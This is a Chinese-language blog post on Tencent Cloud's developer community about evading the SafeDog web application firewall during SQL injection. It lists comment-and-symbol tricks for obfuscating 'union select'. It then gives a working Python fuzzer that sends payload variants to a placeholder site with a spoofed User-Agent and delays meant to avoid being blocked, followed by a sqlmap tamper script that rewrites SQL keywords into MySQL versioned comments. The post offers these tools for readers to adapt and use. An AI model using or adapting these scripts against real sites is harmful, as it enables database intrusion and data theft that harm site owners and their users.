前往小程序,Get更优阅读体验!
立即前往
文档建议反馈控制台
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
发布
首页
学习
活动
专区
工具
TVP最新优惠活动
返回腾讯云官网
社区首页 >专栏 >从bypass safedog到Tamper的编写

从bypass safedog到Tamper的编写

作者头像
洛米唯熊
发布2020-02-11 17:57:43
4820
发布2020-02-11 17:57:43
举报
文章被收录于专栏:洛米唯熊洛米唯熊

0x00:前言

本文主要讲述一些思路。仅供参考

0x01:过程

unionselect 两位小家伙跟safedog的爱恨情仇

1、内联注释 /**/

正常响应

2、注释+特殊符号 /*特殊符号*/

正常响应

3、注释+特殊符号+字母+数字 /*特殊符号+数字+字母*/

正常响应

4、多层套用

栗子:/*!unoin/*/*/*/**/*select*/

0x02:FUZZ脚本编写

:随机伪造UA头,每次请求都使用随机生成的UA头。为了减少复杂度,随机生成UA头的功能可以通过第三方模块库fake-useragent实现,

可以使用pip进行快速安装。

代码语言:javascript
复制
pip install fake-useragent
代码语言:javascript
复制
# ! -*- encoding:utf-8 -*-
#The author:@Jaky

import requests,time
def Jaky(url_start):
  fuzz_aa = ['/*', '*/', '/*!', '*', '=', '`', '!', '@', '%', '.', '-', '+', '|', '%00']
  fuzz_bb = ['', ' ']
  fuzz_cc = ["%0a", "%0b", "%0c", "%0d", "%0e", "%0f", "%0g", "%0h", "%0i", "%0j"]
  fuzz = fuzz_aa + fuzz_bb + fuzz_cc
  headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25"
    }#也可以采用随机头,过狗更放心

  for a in fuzz:
      for b in fuzz:
          for c in fuzz:
              for d in fuzz:
                  exp = "/*!union" + a + b + c + d + "select*/ 1,2,3"
                  url = url_start + exp
                  res = requests.get(url=url, headers=headers)
                  time.sleep(2)#延迟2秒,防止被咬
                  print("Now URL:" + url)
                  if "技术支持" in res.text: #检测关键词需要自行修改
                      print("Find Fuzz bypass:" + url)
                          
if __name__ == '__main__':
  Jaky("http://www.xxx.cn/article/article.php?id=4")

这里我只采用了简单的5层套用。应该是够用了。

0x03:Tamper脚本编写

代码语言:javascript
复制
#!/usr/bin/env python
#Author:Jaky

from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
import os

__priority__ = PRIORITY.LOW

def dependencies():
    singleTimeWarnMessage("Jaky_Bypass_safedog '%s' is %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))

def tamper(payload, **kwargs):
    payload=payload.replace('AND','/*!53203520AND*/')
    payload=payload.replace('ORDER','/*!53203520order*/')
    payload=payload.replace("SELECT","/*!53203520select")
    payload=payload.replace('USER())','hex(user/**/()))')
    payload=payload.replace('SESSION_USER()','hex(SESSION_USER(-- B%0a))')
    payload=payload.replace('UNION ALL SELECT','union/*!53203520/**/select*/')
    return payload

这里我采用符号+数字的绕过方式

脚本简单

因需自行修改

记得Sqlmap加延迟3秒或者以上,防止被咬。

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-01-02,如有侵权请联系 cloudcommunity@tencent.com 删除
pip
select
union
脚本

本文分享自 洛米唯熊 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

pip
select
union
脚本
评论
登录后参与评论
0 条评论
热度
最新
登录 后参与评论
推荐阅读
LV.
文章
0
获赞
0
领券

腾讯云开发者

扫码关注腾讯云开发者

扫码关注腾讯云开发者

领取腾讯云代金券

热门产品

热门推荐

更多推荐

Copyright © 2013 - 2024 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有 

深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569

腾讯云计算(北京)有限责任公司 京ICP证150476号 |  京ICP备11018762号 | 京公网安备号11010802020287

问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档

Copyright © 2013 - 2024 Tencent Cloud.

All Rights Reserved. 腾讯云 版权所有

登录 后参与评论